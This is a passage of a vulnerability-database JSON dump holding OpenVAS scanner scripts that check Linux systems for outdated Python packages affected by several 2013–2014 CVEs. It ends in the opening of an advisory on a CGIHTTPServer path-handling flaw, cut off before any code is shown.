isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.6-8ubuntu0.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.4\", ver:\"3.4.0-2ubuntu1.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.4-minimal\", ver:\"3.4.0-2ubuntu1.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.3-0ubuntu3.8\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.3-0ubuntu3.8\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.2\", ver:\"3.2.3-0ubuntu3.7\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.2-minimal\", ver:\"3.2.3-0ubuntu3.7\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-27T14:56:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "description": "Oracle Linux Local Security Checks ELSA-2015-2101", "modified": "2018-09-28T00:00:00", "published": "2015-11-24T00:00:00", "id": "OPENVAS:1361412562310122760", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122760", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-2101", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-2101.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122760\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-11-24 10:17:32 +0200 (Tue, 24 Nov 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-2101\");\n script_tag(name:\"insight\", value:\"ELSA-2015-2101 - python security, bug fix, and enhancement update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-2101\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-2101.html\");\n script_cve_id(\"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2013-1752\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-debug\", rpm:\"python-debug~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-devel\", rpm:\"python-devel~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-libs\", rpm:\"python-libs~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-test\", rpm:\"python-test~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-tools\", rpm:\"python-tools~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"tkinter\", rpm:\"tkinter~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-27T14:56:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650", "CVE-2014-9365"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2015-11-20T00:00:00", "id": "OPENVAS:1361412562310871501", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871501", "type": "openvas", "title": "RedHat Update for python RHSA-2015:2101-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for python RHSA-2015:2101-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871501\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-11-20 06:24:47 +0100 (Fri, 20 Nov 2015)\");\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\",\n \"CVE-2014-7185\", \"CVE-2014-9365\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for python RHSA-2015:2101-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Python is an interpreted, interactive,\nobject-oriented programming language often compared to Tcl, Perl, Scheme, or\nJava. Python includes modules, classes, exceptions, very high level dynamic\ndata types and dynamic typing. Python supports interfaces to many system calls\nand libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and\nMFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict the\nsize of gzip-compressed HTTP responses. A malicious XMLRPC server could\ncause an XMLRPC client using xmlrpclib to consume an excessive amount of\nmemory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An attacker\nable to control the index value passed to one of the affected functions\ncould possibly use this flaw to disclose portions of the application\nmemory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or urllib)\ndid not perform verification of TLS/SSL certificates when connecting to\nHTTPS servers. A man-in-the-middle attacker could use this flaw to hijack\nconnections and eavesdrop or modify transferred data. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to enable\ncertificate verification by default. However, for backwards compatibility,\nverification remains disabled by default. Future updates may change this\ndefault. Refer to the Knowledgebase article 2039753 linked to in the\nReferences section for further details about this change. (BZ#1219108)\n\nThis update also fixes the following bugs:\n\n * Subprocesses used with the Eventlet library or regular threads previously\ntried to close epoll file descriptors twice, which led to an 'Invalid\nargument' error. Subprocesses h ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"python on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:2101-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-November/msg00019.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~34.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-debuginfo\", rpm:\"python-debuginfo~2.7.5~34.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-devel\", rpm:\"python-devel~2.7.5~34.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-libs\", rpm:\"python-libs~2.7.5~34.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-1912", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "description": "Oracle Linux Local Security Checks ELSA-2015-1064", "modified": "2019-03-14T00:00:00", "published": "2016-02-05T00:00:00", "id": "OPENVAS:1361412562310122870", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122870", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-1064", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1064.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122870\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-02-05 14:01:39 +0200 (Fri, 05 Feb 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1064\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1064\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1064.html\");\n script_cve_id(\"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2013-1752\", \"CVE-2014-1912\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(7|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"python27\", rpm:\"python27~1.1~20.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python\", rpm:\"python27-python~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-debug\", rpm:\"python27-python-debug~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-devel\", rpm:\"python27-python-devel~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-libs\", rpm:\"python27-python-libs~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-pip\", rpm:\"python27-python-pip~1.5.6~5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-setuptools\", rpm:\"python27-python-setuptools~0.9.8~5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-simplejson\", rpm:\"python27-python-simplejson~3.2.0~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-test\", rpm:\"python27-python-test~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-tools\", rpm:\"python27-python-tools~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-wheel\", rpm:\"python27-python-wheel~0.24.0~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-runtime\", rpm:\"python27-runtime~1.1~20.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-scldevel\", rpm:\"python27-scldevel~1.1~20.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-tkinter\", rpm:\"python27-tkinter~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"python27\", rpm:\"python27~1.1~17.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python\", rpm:\"python27-python~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-debug\", rpm:\"python27-python-debug~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-devel\", rpm:\"python27-python-devel~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-libs\", rpm:\"python27-python-libs~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-pip\", rpm:\"python27-python-pip~1.5.6~5.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-setuptools\", rpm:\"python27-python-setuptools~0.9.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-simplejson\", rpm:\"python27-python-simplejson~3.2.0~2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-test\", rpm:\"python27-python-test~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-tools\", rpm:\"python27-python-tools~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-wheel\", rpm:\"python27-python-wheel~0.24.0~2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-runtime\", rpm:\"python27-runtime~1.1~17.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-scldevel\", rpm:\"python27-scldevel~1.1~17.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-tkinter\", rpm:\"python27-tkinter~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T23:01:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4616"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120575", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120575", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-374)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120575\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:29:53 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-374)\");\n script_tag(name:\"insight\", value:\"It was\");\n script_tag(name:\"solution\", value:\"Run yum update python-simplejson to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-374.html\");\n script_cve_id(\"CVE-2014-4616\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"python-simplejson-debuginfo\", rpm:\"python-simplejson-debuginfo~3.5.3~1.7.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-simplejson\", rpm:\"python-simplejson~3.5.3~1.7.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:37:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4616"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-07-01T00:00:00", "id": "OPENVAS:1361412562310867929", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867929", "type": "openvas", "title": "Fedora Update for python FEDORA-2014-7800", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python FEDORA-2014-7800\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867929\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-01 15:22:41 +0530 (Tue, 01 Jul 2014)\");\n script_cve_id(\"CVE-2014-4616\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for python FEDORA-2014-7800\");\n script_tag(name:\"affected\", value:\"python on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-7800\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134903.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~13.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:56", "bulletinFamily": "software", "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "description": "_json information leak, CGIHTTPServer unauthroized files access and code execution, lz4 integer overflow.", "edition": 1, "modified": "2014-07-14T00:00:00", "published": "2014-07-14T00:00:00", "id": "SECURITYVULNS:VULN:13867", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13867", "title": "python security vulnerabilities", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-4650"], "description": "\r\n\r\nAdvisory: Python CGIHTTPServer File Disclosure and Potential Code\r\n Execution\r\n\r\nThe CGIHTTPServer Python module does not properly handle URL-encoded\r\npath separators in URLs. This may enable attackers to disclose a CGI\r\nscript's source code or execute arbitrary CGI scripts in the server's\r\ndocument root.\r\n\r\nDetails\r\n=======\r\n\r\nProduct: Python CGIHTTPServer\r\nAffected Versions:\r\n 2.7 - 2.7.7,\r\n 3.2 - 3.2.4,\r\n 3.3 - 3.3.2,\r\n 3.4 - 3.4.1,\r\n 3.5 pre-release\r\nFixed Versions:\r\n 2.7 rev b4bab0788768,\r\n 3.2 rev e47422855841,\r\n 3.3 rev 5676797f3a3e,\r\n 3.4 rev 847e288d6e93,\r\n 3.5 rev f8b3bb5eb190\r\nVulnerability Type: File Disclosure, Directory Traversal, Code Execution\r\nSecurity Risk: high\r\nVendor URL: https://docs.python.org/2/library/cgihttpserver.html\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-008\r\nAdvisory Status: published\r\nCVE: CVE-2014-4650\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4650\r\n\r\n\r\nIntroduction\r\n============\r\n\r\nThe CGIHTTPServer module defines a request-handler class, interface\r\ncompatible with BaseHTTPServer. BaseHTTPRequestHandler and inherits\r\nbehavior from SimpleHTTPServer. SimpleHTTPRequestHandler but can also\r\nrun CGI scripts.\r\n\r\n(from the Python documentation)\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe CGIHTTPServer module can be used to set up a simple HTTP server with\r\nCGI scripts. A sample server script in Python may look like the\r\nfollowing:\r\n\r\n------------------------------------------------------------------------\r\n#!/usr/bin/env python2\r\n\r\nimport 